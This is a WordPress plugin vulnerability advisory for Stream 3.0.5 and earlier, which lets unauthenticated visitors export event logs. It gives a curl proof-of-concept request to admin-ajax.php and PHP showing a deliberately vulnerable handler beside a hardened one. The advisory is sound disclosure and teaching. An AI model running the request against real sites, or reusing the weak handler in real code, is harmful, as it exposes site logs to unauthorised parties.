wpvulndb
WPVDB-ID: 8FA150BE-75C2-48B3-8D3B-BC623F25DEBD
History: May 31, 2016 - 12:00 a.m.

Stream <= 3.0.5 - Unauthenticated Events Export

2016-05-31 00:00:00
James Golovich
wpscan.com
5

The Stream WordPress plugin allows unauthenticated users to export recent events as CSV or JSON. The export code only checks whether the expected GET variables are present on a request to a valid backend WordPress handler; it performs no authentication or capability check and will happily export the logged entries. Reported to the maintainers on 5/25/2016; a new version was released on 5/30/2016.

PoC

curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "action=nonexistingaction" 'http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&record-actions=export-json'
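The root cause described above is a handler that decides to export based only on the presence of GET parameters. Because admin-ajax.php bootstraps the admin context and fires admin_init for every visitor, logged in or not, any export code hooked there runs before WordPress rejects the unknown "action" value. The following is an added, illustrative example written for this entry and is not the Stream plugin's code: it shows a hypothetical admin_init export handler in the weak form beside a hardened form that requires a logged-in user with a suitable capability plus a nonce. The function names, the "example_export" nonce action, the "manage_options" capability choice and the "example_export_records" filter are assumptions for the example.

```php
<?php
// Illustrative example (not the Stream plugin's code). Hypothetical export
// handlers hooked on admin_init, which fires on admin-ajax.php for every
// request, authenticated or not.

// Emits the export. Records come from a hypothetical filter so the example
// is self-contained; a real plugin would query its own log table here.
function example_send_export( $format ) {
    $records = apply_filters( 'example_export_records', array() );
    nocache_headers();
    if ( 'csv' === $format ) {
        header( 'Content-Type: text/csv; charset=utf-8' );
        header( 'Content-Disposition: attachment; filename="events.csv"' );
        $out = fopen( 'php://output', 'w' );
        foreach ( $records as $row ) {
            fputcsv( $out, $row );
        }
        fclose( $out );
    } else {
        header( 'Content-Type: application/json; charset=utf-8' );
        header( 'Content-Disposition: attachment; filename="events.json"' );
        echo wp_json_encode( $records );
    }
    exit;
}

// WEAK PATTERN: the only gate is "are the expected GET variables present?".
// Any visitor who knows the parameter names receives the full export.
function example_export_weak() {
    if ( isset( $_GET['page'], $_GET['record-actions'] )
        && 'wp_stream' === $_GET['page']
        && 'export-json' === $_GET['record-actions'] ) {
        example_send_export( 'json' );
    }
}

// HARDENED PATTERN: parameters select the format, but the decision to export
// rests on authentication, a capability check and a nonce.
function example_export_hardened() {
    if ( ! isset( $_GET['page'], $_GET['record-actions'] ) ) {
        return;
    }
    if ( 'wp_stream' !== $_GET['page'] ) {
        return;
    }
    // Whitelist the requested format instead of trusting the raw value.
    $action = sanitize_key( wp_unslash( $_GET['record-actions'] ) );
    $formats = array( 'export-csv' => 'csv', 'export-json' => 'json' );
    if ( ! isset( $formats[ $action ] ) ) {
        return;
    }
    // Authorisation: an anonymous visitor, or a user without the capability,
    // gets a 403 rather than the data. The capability name is an assumption.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Sorry, you are not allowed to export events.', 403 );
    }
    // CSRF protection: the link must carry a nonce created with
    // wp_nonce_url( $url, 'example_export' ). check_admin_referer() dies on
    // a missing or invalid nonce. A nonce alone is not an auth check, which is
    // why the capability test above comes first.
    check_admin_referer( 'example_export' );
    example_send_export( $formats[ $action ] );
}

add_action( 'admin_init', 'example_export_hardened' );
```

When reviewing a plugin for this class of bug, look for any code on init, admin_init or plugins_loaded that reads $_GET or $_REQUEST and produces output or a file download; those hooks run for unauthenticated requests to admin-ajax.php and admin-post.php, so an "is this the admin area?" assumption is not a substitute for current_user_can().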

CPE
Name     Operator   Version
stream   lt         3.0.6